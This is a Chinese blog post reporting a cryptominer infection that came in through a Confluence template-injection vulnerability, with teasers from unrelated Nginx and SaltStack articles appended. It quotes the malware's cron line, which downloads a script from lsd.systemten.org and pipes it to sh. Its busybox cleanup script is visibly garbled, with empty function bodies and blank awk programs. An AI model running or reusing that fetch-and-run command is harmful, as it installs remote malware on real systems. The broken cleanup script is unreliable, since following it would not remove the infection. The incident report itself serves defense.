Confluence漏洞導致伺服器被入侵

2021-09-25 08:12:46 字數 2620 閱讀 6724

7.17凌晨1點左右,突然接收到伺服器報警cpu達到100%,負載飆高,tcp連線數明顯突增,部分業務無法正常訪問。

緊急登入伺服器進行排查,top發現polkitds占用大量cpu,kill程序後,隔了幾分鐘cpu再次飆高,last,w等命令無法正常使用,懷疑受到病毒攻擊,排查crontab時發現如下計畫任務且刪除無效,同時.bashrc也發現相同命令:

*/15 * * * * (curl -fssl lsd.systemten.org|wget -q -o- lsd.systemten.org)|sh ##
查詢發現lsd.systemten.org是乙個挖礦**,故確定中了挖礦病毒

參考:

cd busybox-1.30.1/

make defconfig

make

make install

ln -s `pwd`/busybox /usr/bin/busybox

busybox|grep busybox |grep v

編寫busybox修復指令碼

#!/bin/bash

#可以重複執行幾次,防止互相拉起導致刪除失敗

function installbusybox()

function banhosts()

function fixcron()

function killprocess()' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null

busybox ps -ef | busybox grep -v grep | busybox grep 'khugepageds' | busybox awk '' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null

busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null

busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null

busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null

busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null

busybox rm -f /tmp/khugepageds

busybox rm -f /usr/sbin/kerberods

busybox rm -f /usr/sbin/kthrotlds

busybox rm -f /usr/sbin/kintegrityds

busybox rm -f /usr/sbin/kpsmouseds

busybox find /tmp -mtime -4 -type f | busybox xargs busybox rm -rf

}function clearlib()

function clearinit()

function recoverok()

#先停止crontab服務

service crond stop

#防止病毒繼續擴散

banhosts

#清除lib劫持

clearlib

#修復crontab

fixcron

killprocess

clearlib

killprocess

#刪除異常開機項

clearinit

fixcron

recoverok

如果查殺不成功,重複進行多次查殺,盡量在短時間內完成所有操作並重啟,防止病毒利用已載入的動態鏈結庫恢復感染!!!

參考:通過查詢發現confluence最近發布乙個新的漏洞,confluence server與confluence資料中心中的widget聯結器存在服務端模板注入漏洞,攻擊者能利用此漏洞能夠實現目錄穿越與遠端**執行。

涉及版本:影響版本6.6.7之前的所有版本的confluence server和confluence資料中心,6.8.5之前的版本6.7.0(6.8.x的固定版本),6.9.3之前的6.9.0版本(6.9的固定版本)

伺服器上安裝了confluence-6.8.1,導致此次挖礦病毒入侵

1.定期檢視已安裝的軟體是否發布漏洞警告,及時公升級版本或補丁

2.謹慎使用免密登入

3.禁止root登入,在特殊需求下再開啟

Nginx 配置錯誤導致漏洞

crlf是 回車 換行 r n 的簡稱,即我們都知道在http協議中,http header與http body是用兩個crlf分隔的,瀏覽器就是根據這兩個crlf來提取http 內容 一旦我們能夠控制http頭,通過注入一些crlf這樣就可以控制header和body的分割線,這樣我們就可以向bo...

Nginx 配置錯誤導致漏洞

好好學習,天天向上 由於一些不安全的配置引起的漏洞 無這裡使用1版本 使用vulhub 使用docker啟動 docker compose build docker compose up d 執行成功後,nginx將會監聽8080 8081 8082三個埠,分別對應三種漏洞。nginx會將 uri進...

手工清除Saltstack漏洞導致的挖礦病毒

saltstack是基於python開發的一套c s自動化運維工具。近日,saltstack被爆存在認證繞過漏洞 cve 2020 11651 和目錄遍歷漏洞 cve 2020 11652 其中 cve 2020 11652 為目錄遍歷漏洞,攻擊者可構造惡意請求,讀取伺服器上任意檔案,獲取系統敏感資...